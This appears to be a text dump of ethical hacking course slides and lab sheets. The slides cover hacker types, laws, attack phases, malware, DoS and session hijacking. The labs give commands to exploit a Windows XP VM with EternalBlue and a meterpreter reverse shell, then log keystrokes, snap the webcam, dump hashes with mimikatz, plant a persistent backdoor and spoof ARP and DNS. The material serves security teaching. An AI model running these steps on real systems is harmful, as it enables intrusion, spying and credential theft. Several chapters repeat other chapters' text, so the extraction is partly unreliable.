hacking_merged_merged.pdf
Document Details
Uploaded by ThankfulOlivine
Tags
Full Transcript
CYS3104 Chapter 1 Ethical Hacking Overview By Kushantha Gunawardana OBJECTIVES Describe the role of an ethical hacker Describe what you can do legally as an ethical hacker Describe what you cannot do as an ethical hacker Classification of Hackers Hacking Terminology Ethic...
CYS3104 Chapter 1 Ethical Hacking Overview By Kushantha Gunawardana OBJECTIVES Describe the role of an ethical hacker Describe what you can do legally as an ethical hacker Describe what you cannot do as an ethical hacker Classification of Hackers Hacking Terminology Ethical Hacking By Kushantha Gunawardana 2 INTRODUCTION TO ETHICAL HACKING Ethical hackers Employed by companies to perform penetration tests Penetration test Legal attempt to break into a company’s network to find its weakest link Tester only reports findings, does not solve problems Security test More than an attempt to break in; also includes analyzing company’s security policy and procedures Tester offers solutions to secure or protect the network Ethical Hacking By Kushantha Gunawardana 3 THE ROLE OF SECURITY AND PENETRATION TESTERS Hackers Access computer system or network without authorization Breaks the law; can go to prison Crackers Break into systems to steal or destroy data U.S. Department of Justice calls both hackers Ethical hacker Performs most of the same activities but with owner’s permission Ethical Hacking By Kushantha Gunawardana 4 THE ROLE OF SECURITY AND PENETRATION TESTERS Script kiddies or packet monkeys Young inexperienced hackers Copy codes and techniques from knowledgeable hackers Experienced penetration testers write programs or scripts using these languages Practical Extraction and Report Language (Perl), C, C++, Python, JavaScript, Visual Basic, SQL, and many others Script Set of instructions that runs in sequence Ethical Hacking By Kushantha Gunawardana 5 IT TAKES TIME TO BECOME A HACKER This class alone won’t make you a hacker, or an expert It might make you a script kiddie It usually takes years of study and experience to earn respect in the hacker community It’s a hobby, a lifestyle, and an attitude A drive to figure out how things work Ethical Hacking By Kushantha Gunawardana 6 THE ROLE OF SECURITY AND PENETRATION TESTERS Tiger box Collection of OSs and hacking tools Usually on a laptop Helps penetration testers and security testers conduct vulnerabilities assessments and attacks Examples for Tiger boxes; Kali Linux Parrot Security Security Onion Predator Ethical Hacking By Kushantha Gunawardana 7 PENETRATION-TESTING METHODOLOGIES White box model Tester is told everything about the network topology and technology Network diagram Tester is authorized to interview IT personnel and company employees Makes tester’s job a little easier Ethical Hacking By Kushantha Gunawardana 8 9 Ethical Hacking By Kushantha Gunawardana 10 Ethical Hacking By Kushantha Gunawardana PENETRATION-TESTING METHODOLOGIES Black box model Company staff does not know about the test Tester is not given details about the network ▪ Burden is on the tester to find these details Tests if security personnel are able to detect an attack Ethical Hacking By Kushantha Gunawardana 11 PENETRATION-TESTING METHODOLOGIES Gray box model Hybrid of the white and black box models Company gives tester partial information Ethical Hacking By Kushantha Gunawardana 12 CERTIFICATION PROGRAMS FOR NETWORK SECURITY PERSONNEL Certification programs available in almost every area of network security Basics: CompTIA Security+ (CNIT 120) Network+ (CNIT 106 or 201) Cisco Network Security Ethical Hacking By Kushantha Gunawardana 13 Ethical Hacking By Kushantha Gunawardana Ethical Ethical Hacking Hacking By By Kushantha Kushantha Gunawardana Gunawardana Issued by the International Information Systems Security Certifications Consortium (ISC2) Usually more concerned with policies and procedures than technical details Web site www.isc2.org Ethical Hacking By Kushantha Gunawardana SANS INSTITUTE SysAdmin, Audit, Network, Security (SANS) Offers certifications through Global Information Assurance Certification (GIAC) Top 20 list One of the most popular SANS Institute documents Details the most common network exploits Suggests ways of correcting vulnerabilities Web site www.sans.org (links Ch 1i & Ch 1j) Ethical Hacking By Kushantha Gunawardana 17 WHAT YOU CAN DO LEGALLY Laws involving technology change as rapidly as technology itself Find what is legal for you locally Laws change from place to place Be aware of what is allowed and what is not allowed Ethical Hacking By Kushantha Gunawardana 18 LAWS OF THE LAND Tools on your computer might be illegal to possess Contact local law enforcement agencies before installing hacking tools Written words are open to interpretation Governments are getting more serious about punishment for cybercrimes Ethical Hacking By Kushantha Gunawardana 19 IS PORT SCANNING LEGAL? Some states deem it legal Not always the case Federal Government does not see it as a violation Allows each state to address it separately Read your ISP’s “Acceptable Use Policy” IRC “bots” may be forbidden Program that sends automatic responses to users Gives the appearance of a person being present Ethical Hacking By Kushantha Gunawardana 20 Federal computer crime laws are getting more specific Cover cybercrimes and intellectual property issues Computer Hacking and Intellectual Property (CHIP) New government branch to address cybercrimes and intellectual property issues Ethical Hacking By Kushantha Gunawardana 21 FEDERAL LAWS Ethical Hacking By Kushantha Gunawardana 22 WHAT YOU CANNOT DO LEGALLY Accessing a computer without permission is illegal Other illegal actions Installing worms or viruses Denial of Service attacks Denying users access to network resources Be careful your actions do not prevent customers from doing their jobs Ethical Hacking By Kushantha Gunawardana 23 GET IT IN WRITING Using a contract is just good business Contracts may be useful in court Books on working as an independent contractor The Computer Consultant’s Guide by Janet Ruhl Getting Started in Computer Consulting by Peter Meyer Internet can also be a useful resource Have an attorney read over your contract before sending or signing it Ethical Hacking By Kushantha Gunawardana 24 ETHICAL HACKING IN A NUTSHELL What it takes to be a security tester Knowledge of network and computer technology Ability to communicate with management and IT personnel Understanding of the laws Ability to use necessary tools Ethical Hacking By Kushantha Gunawardana 25 CYS3104 Chapter 2 Ethical Hacking Overview By Kushantha Gunawardana Hackers and their vocabulary Threats and risks Types of hackers Gaining access Intrusion detection and prevention Legal and ethical issues Hacking - showing computer expertise Cracking - breaching security on software or systems Phreaking - cracking telecom networks Spoofing - faking the originating IP address in a datagram Denial of Service (DoS) - flooding a host with sufficient network traffic so that it can’t respond anymore Port Scanning - searching for vulnerabilities 1969 - Unix ‘hacked’ together 1971 - Cap ‘n Crunch phone exploit discovered 1988 - Morris Internet worm crashes 6,000 servers 1994 - $10 million transferred from CitiBank accounts 1995 - Kevin Mitnick sentenced to 5 years in jail 2000 - Major websites succumb to DDoS 2000 - 15,700 credit and debit card numbers stolen from Western Union (hacked while web database was undergoing maintenance) 2001 Code Red exploited bug in MS IIS to penetrate & spread probes random IPs for systems running IIS had trigger time for denial-of-service attack 2nd wave infected 360000 servers in 14 hours Code Red 2 - had backdoor installed to allow remote control Nimda -used multiple infection mechanisms email, shares, web client , IIS 2002 – Slammer Worm brings web to its knees by attacking MS SQL Server Denial of Service (Yahoo, eBay, CNN, MS) Defacing, Graffiti, Slander, Reputation Loss of data (destruction, theft) Divulging private information (AirMiles, corporate espionage, personal financial) Loss of financial assets (CitiBank) Professional hackers Black Hats – the Bad Guys White Hats – Professional Security Experts Script kiddies Mostly kids/students User tools created by black hats, To get free stuff Impress their peers Not get caught Underemployed Adult Hackers Former Script Kiddies Can’t get employment in the field Want recognition in hacker community Big in eastern european countries Ideological Hackers hack as a mechanism to promote some political or ideological purpose Usually coincide with political events Criminal Hackers Real criminals, are in it for whatever they can get no matter who it hurts Corporate Spies Are relatively rare Disgruntled Employees Most dangerous to an enterprise as they are “insiders” Since many companies subcontract their network services a disgruntled vendor could be very dangerous to the host enterprise Front door Password guessing Password/key stealing Back doors Often left by original developers as debug and/or diagnostic tools Forgot to remove before release Trojan Horses Usually hidden inside of software that we download and install from the net (remember nothing is free) Many install backdoors Software vulnerability exploitation Often advertised on the OEMs web site along with security patches Fertile ground for script kiddies looking for something to do Whack-a-mole / NetBus Cable modems / DSL very vulnerable Protect with Virus Scanners, Port Scanners, Personal Firewalls AndroRAT Nuclear RAT Buffer overflaws SQL Injection / XSS / Injection Attacks HTML / CGI scripts Poor design of web applications Javascript hacks PHP/ASP/ColdFusion URL hacks Other holes / bugs in software and services Tools and scripts used to scan ports for vulnerabilities Default or null passwords Password same as user name (use finger) Password files, trusted servers Brute force make sure login attempts audited! Dumpster diving Its amazing what people throw in the trash Personal information Passwords Good doughnuts Many enterprises now shred all white paper trash Inside jobs Disgruntled employees Terminated employees (about 50% of intrusions resulting in significant loss) Modify logs To cover their tracks To mess with you Steal files Sometimes destroy after stealing A pro would steal and cover their tracks so to be undetected Modify files To let you know they were there To cause mischief Install back doors So they can get in again Attack other systems A lot of research going on at universities Doug Somerville- EE Dept, Viktor Skorman – EE Dept Big money available due to 9/11 and Dept of Homeland Security Vulnerability scanners pro-actively identifies risks User use pattern matching When pattern deviates from norm should be investigated Network-based IDS examine packets for suspicious activity can integrate with firewall require one dedicated IDS server per segment Host-based IDS monitors logs, events, files, and packets sent to the host installed on each host on network Honeypot decoy server collects evidence and alerts admin Patches and upgrades (hardening) Disabling unnecessary software Firewalls and Intrusion Detection Systems ‘Honeypots’ Recognizing and reacting to port scanning ‘Ethical’ hacking? How to react to mischief or nuisances? Is scanning for vulnerabilities legal? Some hackers are trying to use this as a business model Here are your vulnerabilities, let us help you Can private property laws be applied on the Internet? Financial Fraud Credit Card Theft Identity Theft Computer specific crimes Denial-of-service Denial of access to information Viruses Melissa virus cost New Jersey man 20 months in jail Melissa caused in excess of $80 Million Intellectual Property Offenses Information theft Trafficking in pirated information Storing pirated information Compromising information Destroying information Content related Offenses Hate crimes Harrassment Cyber-stalking Child privacy Computer Fraud and Abuse Act of 1984 Makes it a crime to knowingly access a federal computer Electronic Communications Privacy Act of 1986 Updated the Federal Wiretap Act act to include electronically stored data U.S. Communications Assistance for Law Enforcement Act of 1996 Ammended the Electronic Communications Act to require all communications carriers to make wiretaps possible Economic and Protection of Proprietary Information Act of 1996 Extends definition of privacy to include proprietary economic information , theft would constitute corporate or industrial espionage Health Insurance Portability and Accountability Act of 1996 Standards for the electronic transmission of healthcare information National Information Infrastructure Protection Act of 1996 Amends Computer Fraud and Abuse Act to provide more protection to computerized information and systems used in foreign and interstate commerce or communications The Graham-Lynch-Bliley Act of 1999 Limits instances of when financial institution can disclose nonpublic information of a customer to a third party Average armed robber will get $2500-$7500 and risk being shot or killed; 50-60% will get caught , convicted and spent an average of 5 years of hard time Average computer criminal will net $50K-$500K with a risk of being fired or going to jail; only 10% are caught, of those only 15% will be turned in to authorities; less than 50% of them will do jail time Prosecution Many institutions fail to prosecute for fear of advertising Many banks absorb the losses fearing that they would lose more if their customers found out and took their business elsewhere Fix the vulnerability and continue on with business as usual CYS3104 Chapter 3 Phases of Ethical Hacking By Kushantha Gunawardana Five phases of hacking Reconnaissance Open-source intelligence Scanning Port scanning Ping sweep Vulnerability scanning Enumeration System hacking Network hacking Software hacking Reconnaissance Scanning Gaining Access Maintaining Access Covering Tracks Collect maximum information about network, hosts, ports, services and other target system information. This can be done by directly approaching to the target and gaining knowledge about the target or using indirect methods such as web site, social sites. Techniques : Open-source Intelligence Whois Social engineering Shodan Ping Traceroute Is a method of collecting and analyzing of data from publicly available sources. Tools : Maltego Spyse Intelligence X Recon-ng The Harvester Shodan is a search engine for internet connected devices such as Routers, servers, IoTs, etc. A tool designed to grab information such as emails, subdomains, employee names, banners etc. Whois lookup use to find information related to a specific domain such as owner name, address, contact details etc. Scanning phase is for bulk assessment and identification of listed ports and services. Vulnerability scanning is also a part of this process. Techniques : Port scanning Ping sweep OS detection Method for determining which ports are open on a target. Ports are the place where information sent and received. It is similar to knocking on doors to check whether there is some one. Nmap Netcat Legion Advanced port scanner Ping sweep is a technique use to determine which IPs alive in a network or particular IP range. Tools for ping sweep : Angry IP scanner Fping Advanced ip scanner Hping Network pinger Is a technique to assess possible security vulnerabilities in a target computer, system, service or network. Helps to map exploitations should be launched in next phases. Tools : Nessus Pro Open VAS Rapid7 Burpsuit Nessus vulnerability scan result Alive hosts Open ports Running services and their versions Detected OS versions Detected vulnerabilities Severity level of particular vulnerabilities Solutions Process of identifying resources on a network and more deeply probing of information from a system. Include : List user accounts List file shares Retrieve network information Identify applications SMB enumeration LDAP enumeration DNS enumeration SNMP enumeration SMTP enumeration RPC enumeration Use to enumerate shared network resources and users through SMB service. SMB protocol use to share files inside the network Tools : Smbmap Nmap smb scripts Smbclient enum4linux Light Directory Access Protocol (LDAP) is a protocol use to access directory listing services such as Active directory service. Using LDAP enumeration it can retrieve: Domain structure User names Group names Domain name Forest name Domain and forest levels Tools : Nmap (using ldap-search script) Ldap search Ad-ldap-enum JXplorer CYS3104 Chapter 4 Scanning and enumeration By Kushantha Gunawardana Five phases of hacking Reconnaissance Open-source intelligence Scanning Port scanning Ping sweep Vulnerability scanning Enumeration DNS is a naming system for convert human readable domain names into computer readable IP addresses. It provides essential functionality for the internet to work. Therefore DNS service is very important for accessing remote server using a domain name. If those records are manipulated or hijacked, attacker can access to unauthorized information. Techniques : DNS zone transfer DNS bruteforce Dnsenum dnsrecon DNS brute-forcing Is a method to reveal subdomains of a particular target domain. Using a pre-built wordlist it check for random subdomains to resolve. If they resolve into IPs particular subdomain would actually exist Dnsenum It’s a multithreaded tool written in perl. Use to enumerate DNS information of a domain. It is capable of Get A record, MX record, perform axfr queries (retrieve data from zone transferring), get extra names and subdomains from google scraping, DNS bruteforce, performe reverse lookup on network ranges. Dnsrecon Similar tool like dnsenum but python based. Capable of check all NS records for zone transfer, retrieve general DNS records, SRV record enumeration, wild card resolution, enumeration hosts and subdomains using google, etc. Using above techniques and tools attacker can uncover IP addresses, hidden domains, subdomains, name servers, mail servers’ details and other important information of particular company or organization for further exploitation process. Identifying live hosts is a basic step in attacking methodology. If intended target is unknown this could take long time to find particular live hosts. CYS3104 Chapter 5 System Hacking By Kushantha Gunawardana Password cracking techniques are used to recover passwords from computer systems. Attackers use password cracking techniques to gain unauthorized access to the vulnerable system. Most of the password cracking techniques are successful due to weak or easily guessable passwords. Non-Electronic Attacks Shoulder Surfing Dumpster Diving Active Online Attacks Dictionary Attack Brute Forcing Attack Rule-Based Attack Passive Online Attacks Wire sniffing MITM Replay Attacks Offline Attacks Rainbow Table Attack Distributed Network Attack Security Accounts Manager Windows stores user passwords in SAM, or in the Active Directory Database in domain. Passwords are never stored in clear text ; passwords are hashed and the results are stored in the SAM NTLM Authentication Kerberos Authentication Microsoft has upgraded its default authentication protocol to Kerberos which provides a stronger authentication for client/server applications than NTLM. L0phtCrack Ophcrack Cain & Abel Rainbow Crack Crackmapexec AirCrack Suite Hydra Hashcat Medusa John The Ripper Types of Privilege Escalation Vertical Privilege Escalation Refers to gaining higher privileges than the existing Horizontal Privilege Escalation Refers to acquiring the same level of privileges that already has been granted but assuming the identity user with the similar privileges User -> Admin Passwd Vulnerability Weak permission: service,File DLL Hijacking Admin -> Other/System Pass the Hash Install Service ( sc ) (Access ) Token Kidnapping Process Hijacking ( RunFromProcess) Attackers execute malicious applications in this stage. This is called “owning” the system. Attackers execute malicious programs remotely in the victim’s machine to gather information that leads to exploitation or loss of privacy, gain unauthorized access to system resources , crack the password, capture the screenshots, install a backdoor to maintain easy access, Windows: psexec \\IP –u User –p PW cmd.exe Linux : winexe –U USER%PW //IP cmd.exe Keystroke loggers are programs or hardware devices that monitor each keystroke as user types on a keyboard, logs onto a file, or transmits them to a remote location. Legitimate applications for keyloggers include in office and industrial settings to monitor employees' computer activities and in home environments where parents can monitor and spy on children's activity. It allows attackers to gather confidential information about victims such as email ID, passwords, banking details, chat room activity, IRC, instant messages, etc. Physical keyloggers are placed between the keyboard hardware and the operating system. Hardware Keyloggers Software Keyloggers Spyware is a program that records a user's interaction with the computer and Internet without the user's knowledge and sends them to the remote attackers. Spyware hides its process, files, and other objects in order to avoid detection and removal. It is similar to Trojan horse, which is usually bundled as a hidden component of freeware programs that can be available on the Internet for download. Rootkits are programs that hide their presence as well as attacker's malicious activities, granting them full access to the server or host at that time and also in future. Rootkits replace certain operating system calls and utilities with its own modified versions of those routines that in turn undermine the security of the target system causing malicious functions to be executed. A typical rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, etc Steganography is a technique of hiding a secret message within an ordinary message and extracting it at the destination to maintain confidentiality of data. Utilizing a graphic image as a cover is the most popular method to conceal the data in files. Attackers can use steganography to hide messages such as a list of the compromised servers, source code for the hacking tool, plans for future attacks, etc. Once intruders have successfully gained administrator access on a system, they will try to cover the tracks to avoid their detection. Attacker uses following techniques to cover tracks on the target system: Disabling auditing Clearing Logs Manipulating Logs CYS3104 Chapter 6 Malware Threats By Kushantha Gunawardana Malware is a malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for the purpose of theft or fraud. Examples of Malware Trojan Backdoor Rootkit Ransomware Adware Virus Worms Spyware Botnet Crypter It is a program in which the malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on your hard disk. Trojans get activated upon users' certain predefined actions. Indications of a Trojan attack include abnormal system and network activities such as disabling of antivirus, redirection to unknown pages, etc. Trojans create a covert communication channel between victim computer and attacker for transferring sensitive data. A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document. Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments. Virus Characteristics: Infects other program Transforms itself Encrypts itself Alter data Corrupts files and programs Self-replication Design Replication Launch Detection Incorporation Elimination System or Boot Sector Viruses File and Multipartite Viruses Macro Viruses Cluster Viruses Stealth/Tunneling Viruses Encryption Viruses Metamorphic Viruses File Overwriting or Cavity Viruses Sparse Infector Viruses Companion/Camouflage Viruses Shell Viruses File Extension Viruses Add-on and Intrusive Viruses Transient and Terminate and Stay Resident Viruses Computer worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction. Most of the worms are created only to replicate and spread across a network,consuming available computing resources; however, some worms carry a payload to damage the host system. Attackers use worm payload to install backdoors in infected computers, which turns them into zombies and creates botnets; these botnets can be used to carry out further cyber attacks. Static Malware Analysis Dynamic Malware Analysis CYS3104 Chapter 7 Sniffing By Kushantha Gunawardana Sniffing is a process of monitoring and capturing all data packets passing through a given network using sniffing tools. It is a form of wiretap applied to computer networks. Many enterprises' switch ports are open. Anyone in the same physical location can plug into the network using an Ethernet cable. It is a program in which the malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on your hard disk. Trojans get activated upon users' certain predefined actions. Indications of a Trojan attack include abnormal system and network activities such as disabling of antivirus, redirection to unknown pages, etc. Trojans create a covert communication channel between victim computer and attacker for transferring sensitive data. A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document. Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments. Virus Characteristics: Infects other program Transforms itself Encrypts itself Alter data Corrupts files and programs Self-replication Design Replication Launch Detection Incorporation Elimination System or Boot Sector Viruses File and Multipartite Viruses Macro Viruses Cluster Viruses Stealth/Tunneling Viruses Encryption Viruses Metamorphic Viruses File Overwriting or Cavity Viruses Sparse Infector Viruses Companion/Camouflage Viruses Shell Viruses File Extension Viruses Add-on and Intrusive Viruses Transient and Terminate and Stay Resident Viruses Computer worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction. Most of the worms are created only to replicate and spread across a network,consuming available computing resources; however, some worms carry a payload to damage the host system. Attackers use worm payload to install backdoors in infected computers, which turns them into zombies and creates botnets; these botnets can be used to carry out further cyber attacks. Static Malware Analysis Dynamic Malware Analysis CYS3104 Chapter 8 Social Engineering By Kushantha Gunawardana Social engineering is the art of convincing people to reveal confidential information. Common targets of social engineering include help desk personnel, technical support executives, system administrators, etc. Social engineers depend on the fact that people are unaware of their valuable information and are careless about protecting it. Security policies are as strong as their weakest link, and humans are most susceptible factor. It is difficult to detect social engineering attempts. There is no method to ensure complete security from social engineering attacks. There is no specific software or hardware for defending against a social engineering attack. Human Based Social Engineering Computer Based Social Engineering Mobile Based Social Engineering Eavesdropping Shoulder Surfing Dumpster Diving Reverse Social Engineering Piggybacking Tailgating Pop-up Windows Hoax Letters Chain Letters Instant Chat Messenger Spam Email Phishing Spear Phishing Publishing Malicious Apps Repackaging Legitimate Apps Using SMS Spying If a competitor wants to cause damage to your organization, steal critical secrets, or put you out of business, they just have to find a job opening, prepare someone to pass the interview, have that person hired, and they will be in the organization. Revenge It takes only one disgruntled person to take revenge and your company is compromised. Insider Attack An inside attack is easy to launch. ○ Prevention is difficult. ○ The inside attacker can easily succeed. Identity theft occurs when someone steals your personally identifiable information for fraudulent purposes. It is a crime in which an imposter obtains personal identifying information such as name, credit card number, social security or driver license numbers, etc. to commit fraud or other crimes. Attackers can use identity theft to impersonate employees of a target organization and physically access the facility. CYS3104 Chapter 9 DOS & DDOS By Kushantha Gunawardana Denial of Service (DoS) is an attack on a computer or network that reduces, restricts or prevents accessibility of system resources to its legitimate users. In a DoS attack, attackers flood a victim system with non- legitimate service requests or traffic to overload its resources. DoS attack leads to unavailability of a particular website and show network performance. A distributed denial-of-service (DDoS) attack involves a multitude of compromised systems attacking a single target, thereby causing denial of service for users of the targeted system. To launch a DDoS attack, an attacker uses botnets and attacks a single system. Volumetric Attacks Fragmentation Attacks TCP State-Exhaustion Attacks Application Layer Attacks Bandwidth Attacks and Service Request Floods SYN Flooding Attack ICMP Flood Attack Peer-to-Peer Attacks Application-Level Flood Attacks Permanent Denial-of-Service Attack Distributed Reflection Denial of Service (DrDoS) Phlashing Sabotage Bricking a system Bots are software applications that run automated tasks over the Internet and perform simple repetitive tasks, such as web spidering and search engine indexing. A botnet is a huge network of the compromised systems and can be used by an attacker to launch denial-of-service attacks HULK Tor’s Hammer Slowloris LOIC XOIC DDOSIM RUDY PyLoris CYS3104 Chapter 10 Session Hijacking By Kushantha Gunawardana Session hijacking refers to an attack where an attacker takes over a valid TCP communication session between two computers. Since most authentication only occurs at the start of a TCP session, this allows the attacker to gain access to a machine. Attackers can sniff all the traffic from the established TCP sessions and perform identity theft, information theft, fraud, etc. The attacker steals a valid session ID and uses it to authenticate himself with the server Stealing Guessing Brute Forcing Stealing Session IDs Command Injection Session ID prediction Session Desynchronization Monitor Sniff Session sniffing Predictable session token Man-in-the-middle attack Man-in-the-browser attack Cross-site script attack Cross-site request forgery attack Session replay attack Session fixation Blind Hijacking UDP Hijacking TCP/IP Hijacking RST Hijacking Man-in-the-Middle: Packet Sniffer IP Spoofing: Source Routed Packets Zaproxy Burp Suite Jhijack DroidSheep DroidSniff A distributed denial-of-service (DDoS) attack involves a multitude of compromised systems attacking a single target, thereby causing denial of service for users of the targeted system. To launch a DDoS attack, an attacker uses botnets and attacks a single system. Volumetric Attacks Fragmentation Attacks TCP State-Exhaustion Attacks Application Layer Attacks Bandwidth Attacks and Service Request Floods SYN Flooding Attack ICMP Flood Attack Peer-to-Peer Attacks Application-Level Flood Attacks Permanent Denial-of-Service Attack Distributed Reflection Denial of Service (DrDoS) Phlashing Sabotage Bricking a system Bots are software applications that run automated tasks over the Internet and perform simple repetitive tasks, such as web spidering and search engine indexing. A botnet is a huge network of the compromised systems and can be used by an attacker to launch denial-of-service attacks HULK Tor’s Hammer Slowloris LOIC XOIC DDOSIM RUDY PyLoris CYS3104 Chapter 11 Hacking Web Servers By Kushantha Gunawardana Web servers include both hardware and software that hosts websites; attackers usually target software vulnerabilities and configuration errors to compromise web servers. Network and OS level attacks can be well defended using proper network security measures such as firewalls, IDS, etc., however, web servers are accessible from anywhere on the web, which makes them less secured and more vulnerable to attacks. Improper file and directory permissions Installing the server with default settings Unnecessary services enabled, including content management and remote administration. Security conflicts with business ease-of-use case Lack of proper security policy, procedures, and maintenance. Improper authentication with external systems Default accounts with their default or no passwords. Unnecessary default, backup, or sample files. Misconfiguration in web server, operating systems, and networks. Bugs in server software, OS, and web applications. Misconfigured SSL certificates and encryption settings Administrative or debugging functions that are enabled or accessible on web servers. Use of self-signed certificates and default certificates DoS/DDoS Attacks DNS Server Hijacking DNS Amplification Attack Directory Traversal Attacks Man-in-the-Middle/Sniffing Attack Phishing Attacks Website Defacement Web Server Misconfiguration HTTP Response Splitting Attack Web Cache Poisoning Attack SSH Bruteforce Attack Session sniffing Predictable session token Man-in-the-middle attack Man-in-the-browser attack Cross-site script attack Cross-site request forgery attack Session replay attack Session fixation Blind Hijacking UDP Hijacking TCP/IP Hijacking RST Hijacking Man-in-the-Middle: Packet Sniffer IP Spoofing: Source Routed Packets Zaproxy Burp Suite Jhijack DroidSheep DroidSniff LAB Materials Needed: XP VM image Kali Linux VM Incident report template (provided) Task 1: Setting Up the Environment Deploy the XP VM and Kali Linux VM: Ensure both VMs are on the same virtual network. Verify connectivity between VMs using the ping command Task 2: Conducting Vulnerability Scans Open Metasploit Framework on Kali Linux: “Msfconsole” Perform a Basic Port Scan to Identify Open Ports: Perform a Basic Port Scan using Metasploit's TCP Scanner: “use auxiliary/scanner/portscan/tcp set RHOSTS [XP-IP] run” Select and Run Vulnerability Scanners: 1. FTP Scanner: “use auxiliary/scanner/ftp/anonymous set RHOSTS [XP-IP] run” 2. HTTP Scanner: “use auxiliary/scanner/http/http_version set RHOSTS [XP-IP] run” 3. SMB Scanner: “use auxiliary/scanner/smb/smb_version set RHOSTS [XP-IP] run” 4. SSH Scanner: “use auxiliary/scanner/ssh/ssh_version set RHOSTS [XP-IP] run” Task 3: Documenting the Findings 1. Fill Out the Vulnerability Scan Report Template: o Target Information: Record the IP address and any relevant details about the target. o Scan Details: Note the types of scans performed. o Open Ports and Services: List the open ports and corresponding services detected. o Service Versions: Document the versions of the services running on the open ports. o Potential Vulnerabilities: Identify any potential vulnerabilities based on the services and versions detected. Lab 3 Pre-requisite 1. Start kali and windows xp sessions 2. Get windows XP ip address a. Ipconfig 3. Get kali ip address a. Ifconfig 4. Ensure both VMs are on the same subnet 5. As you have already done the Metasploit tutorial I will skip the essential scanning parts and move straight to the exploit 6. Run msfconsole 7. Search eternalblue a. Load the ms17_010 psexec exploit 8. Load the meterpreter/reverse_tcp payload 9. Set RHOSTs and Rports 10. Run exploit 11. Once meterpreter session has started you may start the activities Activities Try using the following meterpreter commands and document your results Gathering System Information 1. Get system information a. Sysinfo 2. Get User ID a. getuid Session Management 3. List Active Sessions a. sessions -l 4. Interact with a Specific Session a. sessions -i File System Interaction 5. Navigate the File System a. cd b. ls 6. Download a File a. download 7. Upload a File a. upload 8. Read a file a. cat 9. Delete a file a. rm Screenshots and Webcam 10. Take a screenshot a. screenshot b. You can also use screengrab after migrating to specific programs to get specific application screenshots i. Ps to find running programs ii. Migrate iii. Screengrab 11. List webcams a. webcam_list 12. Take photo from the webcam a. webcam_snap Keylogging and Passwords 13. Start Keylogger a. keyscan_start 14. Stop Keylogger a. Keyscan_Stop 15. Dump keystrokes a. keyscan_dump 16. Dump Windows Password Hashes a. run post/windows/gather/hashdump b. This will output the password hashes stored on the Windows machine. These can be cracked offline using tools like John the Ripper or Hashcat. You may try. 17. dump passwords from memory a. run post/windows/gather/credentials/mimikatz Network Pivoting and Tunneling 18. Port Forwarding a. portfwd add -l -p -r Maintaining Access 19. Creating a Persistent Backdoor a. run persistence -U -i 5 -p 4444 -r Escalating Privileges 20. Check for Privilege Escalation a. Getsystem Stop session 21. Exit a. exit Ethical Hacking – Lab 4 ARP and DNS spoofing Description Combined ARP and DNS spoofing attack to intercept and alter DNS queries. Tools Required: Kali Linux with arpspoof, dnsspoof, and Wireshark installed. Windows XP machine. Steps 1. Prepare Kali Linux a. Ensure Apache is installed and running i. sudo apt-get update ii. sudo apt-get install apache2 iii. sudo systemctl start apache2 iv. sudo apt-get install dsniff b. Create a fake webpage i. echo "You have been redirected!" | sudo tee /var/www/html/index.html 2. Setup ARP Spoofing a. Identify network interface and IPs i. Ipconfig ii. ifconfig b. Start ARP spoofing to become the MITM i. Determine Gateway ip then 1. route -n ii. sudo arpspoof -i eth0 -t [Windows XP IP] [Gateway IP] iii. sudo arpspoof -i eth0 -t [Gateway IP] [Windows XP IP] iv. here eth0 should be your interface, you may have to double check with your ipconfig to see if its eth0 or wlan0 etc. 3. Execution of the Attack a. Enable IP Forwarding on Kali (To forward packets between the Windows XP machine and the gateway) i. echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward b. Set up DNS Spoofing i. Prepare dnsspoof to intercept DNS queries 1. sudo dnsspoof -i eth0 c. Monitor the Attack i. Launch Wireshark to capture packets 1. sudo wireshark & ii. Filter for DNS and ARP traffic 1. Enter arp or dns in the filter bar to observe both ARP spoofing activities and DNS requests and responses d. Testing the Attack i. On the Windows XP machine, attempt to visit known websites like www.google.com e. Stop ARP and DNS spoofing and Apache on Kali i. sudo killall arpspoof ii. sudo killall dnsspoof iii. sudo systemctl stop apache2 f. Disable IP forwarding i. echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward Guidelines Show screenshots of each activity Upload the document on or before 10.00am @ 10th of August. Best reports will get 2 extra marks for your results. 1. Intro to Ethical Hacking Definition: Ethical hacking is all about legally breaking into computers and systems to check out how strong their defenses are. White hat hackers (that’s the good guys) use the same tricks as the bad guys (black hats), but they do it with permission. Why it Matters: o Spotting Weak Spots: Finding issues before real hackers do. o Beefing Up Security: Fixing any weak points found. o Following the Rules: Making sure the system is up to scratch with legal standards like PCI-DSS or HIPAA. Examples: o Bug Bounty Programs: Companies like Google and Facebook offer rewards for finding bugs. o Penetration Testing: Simulating an attack to see how well the defenses hold up. 2. Types of Hackers Black Hat Hackers: o Motivation: Usually after money, causing chaos, or spying. o What They Do: Spreading viruses, stealing data, messing with websites. o Example: Kevin Mitnick (before he turned into a white hat) - Known for hacking into big companies like IBM and Nokia. White Hat Hackers: o Motivation: To help companies stay safe by improving security. o What They Do: Conducting security tests, finding vulnerabilities, participating in bug bounty programs. o Example: Charlie Miller - Famous for finding flaws in Apple products. Gray Hat Hackers: o Motivation: Bit of both - they hack without permission but usually don’t mean harm and report what they find. o What They Do: Hacking into systems without consent, then telling the company about it. o Example: Anonymous - A group known for various "hacktivist" activities. Note: Gray hat activities are in a gray area (no pun intended) legally and ethically. Some places consider it illegal no matter the intention. 3. Phases of Ethical Hacking Reconnaissance (Footprinting): o Goal: Gather as much info as you can about the target. o Methods: Passive Recon: No direct contact with the target (e.g., Google Dorking, WHOIS, DNS lookups). Active Recon: Directly interacting with the target (e.g., ping sweeps, port scans). o Tools: Maltego, Recon-ng. Scanning: o Goal: Find open ports, services, and any potential vulnerabilities. o Methods: Port Scanning: Identifying open ports (e.g., using Nmap). Vulnerability Scanning: Checking for known vulnerabilities (e.g., Nessus or OpenVAS). o Tools: Nmap, Nessus, 